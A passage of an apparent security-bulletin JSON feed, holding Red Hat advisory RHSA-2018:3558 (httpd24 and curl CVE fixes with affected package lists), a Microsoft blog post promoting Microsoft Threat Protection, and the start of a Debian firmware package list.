"httpd24-libnghttp2-1.7.1-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "ppc64le", "packageName": "httpd24-libnghttp2", "packageFilename": "httpd24-libnghttp2-1.7.1-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "s390x", "packageName": "httpd24-libnghttp2", "packageFilename": "httpd24-libnghttp2-1.7.1-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "x86_64", "packageName": "httpd24-libnghttp2", "packageFilename": "httpd24-libnghttp2-1.7.1-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.1-7.el6", "arch": "x86_64", "packageName": "httpd24-libnghttp2-devel", "packageFilename": "httpd24-libnghttp2-devel-1.7.1-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "aarch64", "packageName": "httpd24-libnghttp2-devel", "packageFilename": "httpd24-libnghttp2-devel-1.7.1-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "ppc64le", "packageName": "httpd24-libnghttp2-devel", "packageFilename": "httpd24-libnghttp2-devel-1.7.1-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "s390x", "packageName": "httpd24-libnghttp2-devel", "packageFilename": "httpd24-libnghttp2-devel-1.7.1-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "x86_64", "packageName": "httpd24-libnghttp2-devel", "packageFilename": "httpd24-libnghttp2-devel-1.7.1-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-mod_ldap", "packageFilename": "httpd24-mod_ldap-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-mod_ldap", "packageFilename": "httpd24-mod_ldap-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-mod_ldap", "packageFilename": "httpd24-mod_ldap-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-mod_ldap", "packageFilename": "httpd24-mod_ldap-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-mod_ldap", "packageFilename": "httpd24-mod_ldap-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-mod_md", "packageFilename": "httpd24-mod_md-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-mod_md", "packageFilename": "httpd24-mod_md-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-mod_md", "packageFilename": "httpd24-mod_md-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-mod_md", "packageFilename": "httpd24-mod_md-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-mod_proxy_html", "packageFilename": "httpd24-mod_proxy_html-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-mod_proxy_html", "packageFilename": "httpd24-mod_proxy_html-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-mod_proxy_html", "packageFilename": "httpd24-mod_proxy_html-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-mod_proxy_html", "packageFilename": "httpd24-mod_proxy_html-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-mod_proxy_html", "packageFilename": "httpd24-mod_proxy_html-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-mod_session", "packageFilename": "httpd24-mod_session-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-mod_session", "packageFilename": "httpd24-mod_session-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-mod_session", "packageFilename": "httpd24-mod_session-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-mod_session", "packageFilename": "httpd24-mod_session-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-mod_session", "packageFilename": "httpd24-mod_session-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.4.34-7.el6", "arch": "x86_64", "packageName": "httpd24-mod_ssl", "packageFilename": "httpd24-mod_ssl-2.4.34-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "aarch64", "packageName": "httpd24-mod_ssl", "packageFilename": "httpd24-mod_ssl-2.4.34-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "ppc64le", "packageName": "httpd24-mod_ssl", "packageFilename": "httpd24-mod_ssl-2.4.34-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "s390x", "packageName": "httpd24-mod_ssl", "packageFilename": "httpd24-mod_ssl-2.4.34-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "2.4.34-7.el7", "arch": "x86_64", "packageName": "httpd24-mod_ssl", "packageFilename": "httpd24-mod_ssl-2.4.34-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.1-7.el6", "arch": "src", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.1-7.el6", "arch": "x86_64", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "aarch64", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "ppc64le", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "s390x", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "src", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "x86_64", "packageName": "httpd24-nghttp2", "packageFilename": "httpd24-nghttp2-1.7.1-7.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.7.1-7.el6", "arch": "x86_64", "packageName": "httpd24-nghttp2-debuginfo", "packageFilename": "httpd24-nghttp2-debuginfo-1.7.1-7.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "aarch64", "packageName": "httpd24-nghttp2-debuginfo", "packageFilename": "httpd24-nghttp2-debuginfo-1.7.1-7.el7.aarch64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "ppc64le", "packageName": "httpd24-nghttp2-debuginfo", "packageFilename": "httpd24-nghttp2-debuginfo-1.7.1-7.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "s390x", "packageName": "httpd24-nghttp2-debuginfo", "packageFilename": "httpd24-nghttp2-debuginfo-1.7.1-7.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "1.7.1-7.el7", "arch": "x86_64", "packageName": "httpd24-nghttp2-debuginfo", "packageFilename": "httpd24-nghttp2-debuginfo-1.7.1-7.el7.x86_64.rpm", "operator": "lt"}], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe following packages have been upgraded to a later upstream version: httpd24-httpd (2.4.34), httpd24-curl (7.61.1). (BZ#1590833, BZ#1648928)\n\nSecurity Fix(es):\n\n* httpd: Improper handling of headers in mod_session can allow a remote user to modify session data for CGI applications (CVE-2018-1283)\n\n* httpd: Out of bounds read in mod_cache_socache can allow a remote attacker to cause DoS (CVE-2018-1303)\n\n* httpd: mod_http2: Too much time allocated to workers, possibly leading to DoS (CVE-2018-1333)\n\n* httpd: DoS for HTTP/2 connections by continuous SETTINGS frames (CVE-2018-11763)\n\n* httpd: Out of bounds write in mod_authnz_ldap when using too small Accept-Language values (CVE-2017-15710)\n\n* httpd: <FilesMatch> bypass with a trailing newline in the file name (CVE-2017-15715)\n\n* httpd: Out of bounds access after failure in reading the HTTP request (CVE-2018-1301)\n\n* httpd: Weak Digest auth nonce generation in mod_auth_digest (CVE-2018-1312)\n\n* curl: Multiple security issues were fixed in httpd24-curl (CVE-2016-5419, CVE-2016-5420, CVE-2016-5421, CVE-2016-7141, CVE-2016-7167, CVE-2016-8615, CVE-2016-8616, CVE-2016-8617, CVE-2016-8618, CVE-2016-8619, CVE-2016-8620, CVE-2016-8621, CVE-2016-8622, CVE-2016-8623, CVE-2016-8624, CVE-2016-8625, CVE-2016-9586, CVE-2017-1000100, CVE-2017-1000101, CVE-2017-1000254, CVE-2017-1000257, CVE-2017-7407, CVE-2017-8816, CVE-2017-8817, CVE-2018-1000007, CVE-2018-1000120, CVE-2018-1000121, CVE-2018-1000122, CVE-2018-1000301, CVE-2018-14618)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank the Curl project for reporting CVE-2017-8816, CVE-2017-8817, CVE-2017-1000254, CVE-2017-1000257, CVE-2018-1000007, CVE-2018-1000120, CVE-2018-1000122, CVE-2018-1000301, CVE-2016-9586, CVE-2017-1000100, CVE-2017-1000101, CVE-2018-14618, and CVE-2018-1000121. Upstream acknowledges Alex Nichols as the original reporter of CVE-2017-8816; the OSS-Fuzz project as the original reporter of CVE-2017-8817 and CVE-2018-1000301; Max Dymond as the original reporter of CVE-2017-1000254 and CVE-2018-1000122; Brian Carpenter and the OSS-Fuzz project as the original reporters of CVE-2017-1000257; Craig de Stigter as the original reporter of CVE-2018-1000007; Duy Phan Thanh as the original reporter of CVE-2018-1000120; Even Rouault as the original reporter of CVE-2017-1000100; Brian Carpenter as the original reporter of CVE-2017-1000101; Zhaoyang Wu as the original reporter of CVE-2018-14618; and Dario Weisser as the original reporter of CVE-2018-1000121.\n\nBug Fix(es):\n\n* Previously, the Apache HTTP Server from the httpd24 Software Collection was unable to handle situations when static content was repeatedly requested in a browser by refreshing the page. As a consequence, HTTP/2 connections timed out and httpd became unresponsive. This bug has been fixed, and HTTP/2 connections now work as expected in the described scenario. (BZ#1518737)\n\nEnhancement(s):\n\n* This update adds the mod_md module to the httpd24 Software Collection. This module enables managing domains across virtual hosts and certificate provisioning using the Automatic Certificate Management Environment (ACME) protocol. The mod_md module is available only for Red Hat Enterprise Linux 7. (BZ#1640722)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Software Collections 3.2 Release Notes linked from the References section.", "reporter": "RedHat", "published": "2018-11-13T13:00:33", "type": "redhat", "title": "(RHSA-2018:3558) Moderate: httpd24 security, bug fix, and enhancement update", "enchantments": {"score": {"modified": "2018-11-13T08:42:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-5419", "CVE-2016-5420", "CVE-2016-5421", "CVE-2016-7141", "CVE-2016-7167", "CVE-2016-8615", "CVE-2016-8616", "CVE-2016-8617", "CVE-2016-8618", "CVE-2016-8619", "CVE-2016-8620", "CVE-2016-8621", "CVE-2016-8622", "CVE-2016-8623", "CVE-2016-8624", "CVE-2016-8625", "CVE-2016-9586", "CVE-2017-1000100", "CVE-2017-1000101", "CVE-2017-1000254", "CVE-2017-1000257", "CVE-2017-15710", "CVE-2017-15715", "CVE-2017-7407", "CVE-2017-8816", "CVE-2017-8817", "CVE-2018-1000007", "CVE-2018-1000120", "CVE-2018-1000121", "CVE-2018-1000122", "CVE-2018-1000301", "CVE-2018-11763", "CVE-2018-1283", "CVE-2018-1301", "CVE-2018-1303", "CVE-2018-1312", "CVE-2018-1333", "CVE-2018-14618"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-13T13:04:35", "id": "RHSA-2018:3558", "href": "https://access.redhat.com/errata/RHSA-2018:3558", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "mssecure": [{"lastseen": "2018-11-13T17:41:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "At Ignite 2018, we [announced](<https://myignite.techcommunity.microsoft.com/sessions/64344?source=sessions#ignite-html-anchor>) Microsoft Threat Protection, a comprehensive, integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and, infrastructure (Figure 1).\n\nThe foundation of the solution is the [Microsoft Intelligent Security Graph](<https://www.microsoft.com/en-us/security/intelligence>), which correlates 6.5 **_trillion signals daily from email alone_** and enables:\n\n * Powerful machine learning developed by Microsofts [3500 in-house security specialists](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>)\n * Automation capabilities for enhanced hunting, investigation, and remediationhelping reduce burden on IT teams\n * Seamless integration between disparate services\n\n\n\n_Figure 1: Microsoft Threat Protection provides an integrated solution securing the modern workplace_\n\nToday, we revisit some of the solution capabilities announced at Ignite and provide updates on significant enhancements made since September. Engineers across teams at Microsoft are collaborating to unlock the full, envisioned potential of Microsoft Threat Protection. Throughout this journey, we want to keep you updated on its development.\n\n### Services in Microsoft Threat Protection\n\nMicrosoft Threat Protection leverages the unique capabilities of different services to secure several attack vectors. Table 1 summarizes the services in the solution. As each individual service is enhanced, so too is the overall solution.\n\n**Attack vector** | **Services** \n---|--- \nIdentities | \n\n[Azure Active Directory Identity Protection](<https://azure.microsoft.com/en-us/services/active-directory/?&OCID=AID719825_SEM_hNzcjcap&lnkd=Bing_Azure_Brand&msclkid=7e5b643f7a14179cdd383f9ec06b60f3&dclid=CJuOicCIxt0CFcYDrQYdC24IHg>)\n\n[Azure Advanced Threat Protection](<https://azure.microsoft.com/en-us/features/azure-advanced-threat-protection/>)\n\n[Microsoft Cloud App Security](<https://www.microsoft.com/en-us/security/information-protection?&OCID=AID720916_SEM_QtKHjo04>) \nEndpoints | \n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>)\n\n[Windows 10](<https://www.microsoft.com/en-us/software-download/windows10>)\n\n[Microsoft Intune](<https://www.microsoft.com/en-us/cloud-platform/microsoft-intune>) \nUser data | \n\n[Exchange Online Protection](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>)\n\n[Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>)\n\n[Office 365 Threat Intelligence](<https://portal.office.com/signup/logout?OfferId=d49e8fa3-0b3f-4541-9ae4-705740326f6a>)\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>)\n\n[Microsoft Cloud App Security](<https://www.microsoft.com/en-us/security/information-protection?&OCID=AID720916_SEM_QtKHjo04>) \nCloud apps | \n\n[Exchange Online Protection](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>)\n\n[Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>)\n\n[Microsoft Cloud App Security](<https://www.microsoft.com/en-us/security/information-protection?&OCID=AID720916_SEM_QtKHjo04>) \nInfrastructure | \n\nUse one solution, [Azure Security Center](<https://azure.microsoft.com/en-us/services/security-center/>), to protect all your workloads, including SQL, Linux, and Windows, in the cloud and on-premises.\n\n \n \n_Table 1: Services in Microsoft Threat Protection securing the modern workplace attack vectors_\n\n### Strengthening identity security\n\nBy fully integrating [Azure Active Directory Identity Protection (Azure AD Identity Protection)](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Secure-your-hybrid-cloud-environments-with-Azure-AD-Identity/ba-p/262400>) with Azure Advanced Threat Protection (Azure ATP) (Figure 2),Microsoft Threat Protection is able to strengthen identity security.Azure AD Identity Protection uses dynamic intelligence and machine learning to automatically protect and detect against identity attacks. Azure ATP is a cloud-powered service leveraging machine learning to help detect suspicious behavior across hybrid environments from various types of advanced external and insider cyberthreats. The integration of the two enables IT teams to manage identities _and_ perform security operations functions through a unified experience that was previously impossible. The integration allows SecOps investigations of risky users between the two products through a single pane of glass. We will start offering customers this integrated experience over the next few weeks.\n\n\n\n_Figure 2: Integrating Azure ATP with the Azure AD Identity Protection console_\n\n### Enhanced security for the endpoint\n\nFigure 3 illustrates how Microsoft Threat Protection addresses specific customer challenges.\n\n\n\n_Figure 3: Microsoft Threat Protection is built to address specific customer challenges_\n\nAutomation is a powerful capability, promising greater control and shorter threat resolution times even as the digital estate expands. We [recently demonstrated](<https://techcommunity.microsoft.com/t5/What-s-New/Automating-investigation-and-response-for-memory-based-attacks/m-p/276354#M146>) our focus on automation by adding automated investigation and remediation capabilities for memory-based/file-less attacks in our industry leading endpoint security service, [Windows Defender Advanced Threat Protection (Windows Defender ATP)](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>). Now the service can leverage automated memory forensics to incriminate malicious memory regions and perform required in-memory remediation actions. The unique new capability enables fully automated investigations and resolution flow formemory-based attacks, going beyond simply alerting and saving security teams precious time of manual memory forensic effort.\n\nFigure 4 shows the investigation graph of an ongoing investigation in the Windows Defender Security Center. To enable the new feature, [run the October 2018 update of Windows 10 and enable the preview features](<https://securitycenter.windows.com/preferences2/integration>). The capability was released earlier this year and can now mark your alerts as resolved automatically once automation successfully remediates the threat.\n\n\n\n_Figure 4: Investigation graph of ongoing investigation in Windows Defender Security Center_\n\n### Elevating user data and cloud app security\n\nMicrosoft Threat Protection secures user data by leveraging Office 365 threat protection services, including [Office 365 Advanced Threat Protection (Office 365 ATP)](<https://products.office.com/en-us/exchange/online-email-threat-protection>), which provides best-in-class security in Office 365 against advanced threats to email, collaboration apps, and Office clients. We [recently launched Native-Link Rendering](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Enhanced-User-Experience-for-Office-365-Advanced-Threat/ba-p/201121>), (Figure 5)for both the Outlook Client and the Outlook on the Web applicationenabling users to view the destination URL for links in email. This allows users to make an informed decision before clicking through. This feature was a high demand request from customers who educate users on spotting suspicious links in email and were excited to deliver on it. Office 365 ATP is the only email security service for Office 365 offering this powerful feature.\n\n\n\n_Figure 5: Native Link Rendering user experience in Office 365 ATP user_\n\nEnhancements have also been made in securing cloud apps, beginning with the [integration between Microsoft Cloud App Security and Windows Defender ATP](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Microsoft-Cloud-App-Security-and-Windows-Defender-ATP-better/ba-p/263265>). Now, [Microsoft Cloud App Security](<https://www.microsoft.com/en-us/cloud-platform/cloud-app-security>) leverages signal from Windows Defender ATP monitored endpoints, enabling discovery and recovery from unsupported cloud service (shadow IT) usage. [More](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Managing-risky-3rd-party-app-permissions-with-Microsoft-s-CASB/ba-p/276401>) [recently](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Managing-risky-3rd-party-app-permissions-with-Microsoft-s-CASB/ba-p/276401>), [Microsoft Cloud App Security](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Managing-risky-3rd-party-app-permissions-with-Microsoft-s-CASB/ba-p/276401>) further helps reduce impact from shadow IT by providing granular visibility into [Open Authentication (OAuth) application permissions](<https://techcommunity.microsoft.com/t5/Enterprise-Mobility-Security/Managing-risky-3rd-party-app-permissions-with-Microsoft-s-CASB/ba-p/276401>) that have access to Office 365, G Suite, and Salesforce data. OAuth apps are a newer attack vector often leveraged in phishing attacks, where attackers trick users into granting access to rogue applications. In the managing apps view (Figure 6), admins see a full list of both permissions granted to an OAuth app and the users granting the apps access. The permission level details help admins decide which apps users can continue to have access and which ones will have access revoked.\n\n\n\n_Figure 6: Microsoft Cloud App Security apps permission management view_\n\n### Experience the evolution of Microsoft Threat Protection\n\nTake a moment to [learn more about Microsoft Threat Protection](<https://techcommunity.microsoft.com/t5/Security-Privacy-and-Compliance/Announcing-Microsoft-Threat-Protection/ba-p/262783>). [Organizations](<https://customers.microsoft.com/en-us/story/telit-professional-services-microsoft-365>) have already transitioned to Microsoft Threat Protection and [partners](<https://techcommunity.microsoft.com/t5/What-s-New/SecOps-is-more-effective-thanks-to-Microsoft-Windows-Defender/m-p/272925#M145>) are leveraging its powerful capabilities. Start your trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.\n\n * [Windows Defender ATP trial](<https://winatpregistration-prd.trafficmanager.net/UserAgreement?wt.mc_id=AID702266_QSG_245679&ocid=AID702266_QSG_245679>)\n * [Office 365 E5 trial](<https://signup.microsoft.com/signup/logout?OfferId=101bde18-5ffb-4d79-a47b-f5b2c62525b3&dl=ENTERPRISEPREMIUM&culture=en-US&country=US&ali=1>)\n * [Enterprise Mobility + Security (EMS) suite E5 trial](<https://portal.office.com/signup/logout?OfferId=87dd2714-d452-48a0-a809-d2f58c4f68b7&ali=1>)\n * [Azure Security Center trial](<https://account.azure.com/signup?offer=ms-azr-0044p&appId=102&ref=azureplat-generic&redirectURL=https%3a%2f%2fazure.microsoft.com%2fen-us%2fget-started%2fwelcome-to-azure%2f&l=en-us&correlationId=27471f9c-5084-45dc-8dd7-8e967de58165>)\n\n \n\nThe post [The evolution of Microsoft Threat Protection, November update](<https://cloudblogs.microsoft.com/microsoftsecure/2018/11/13/the-evolution-of-microsoft-threat-protection-november-update/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "reporter": "lizwolk", "published": "2018-11-13T17:00:55", "type": "mssecure", "title": "The evolution of Microsoft Threat Protection, November update", "enchantments": {"score": {"modified": "2018-11-13T17:41:27", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-11-13T17:00:55", "id": "MSSECURE:F7CA7A2DDD2AAA883734EF239E11816B", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/13/the-evolution-of-microsoft-threat-protection-november-update/", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2018-11-13T13:51:40", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-ralink_20161130-4~deb8u1_all.deb", "packageName": "firmware-ralink", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-intel-sound_20161130-4~deb8u1_all.deb", "packageName": "firmware-intel-sound", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-iwlwifi_20161130-4~deb8u1_all.deb", "packageName": "firmware-iwlwifi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-linux-nonfree_20161130-4~deb8u1_all.deb", "packageName": "firmware-linux-nonfree", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-siano_20161130-4~deb8u1_all.deb", "packageName": "firmware-siano", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-ti-connectivity_20161130-4~deb8u1_all.deb", "packageName": "firmware-ti-connectivity", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-ivtv_20161130-4~deb8u1_all.deb", "packageName": "firmware-ivtv", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-libertas_20161130-4~deb8u1_all.deb", "packageName": "firmware-libertas", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-atheros_20161130-4~deb8u1_all.deb", "packageName": "firmware-atheros", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-adi_20161130-4~deb8u1_all.deb", "packageName": "firmware-adi", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-intelwimax_20161130-4~deb8u1_all.deb", "packageName": "firmware-intelwimax", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-misc-nonfree_20161130-4~deb8u1_all.deb", "packageName": "firmware-misc-nonfree", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-realtek_20161130-4~deb8u1_all.deb", "packageName": "firmware-realtek", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-qlogic_20161130-4~deb8u1_all.deb", "packageName": "firmware-qlogic", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-ipw2x00_20161130-4~deb8u1_all.deb", "packageName": "firmware-ipw2x00", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-brcm80211_20161130-4~deb8u1_all.deb", "packageName": "firmware-brcm80211", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-samsung_20161130-4~deb8u1_all.deb", "packageName": "firmware-samsung", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-cavium_20161130-4~deb8u1_all.deb", "packageName": "firmware-cavium", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-bnx2_20161130-4~deb8u1_all.deb", "packageName": "firmware-bnx2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-bnx2x_20161130-4~deb8u1_all.deb", "packageName": "firmware-bnx2x", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "20161130-4~deb8u1", "arch": "all", "packageFilename": "firmware-nonfree_20161130-4~deb8u1_all.deb", "packageName": "firmware-nonfree", 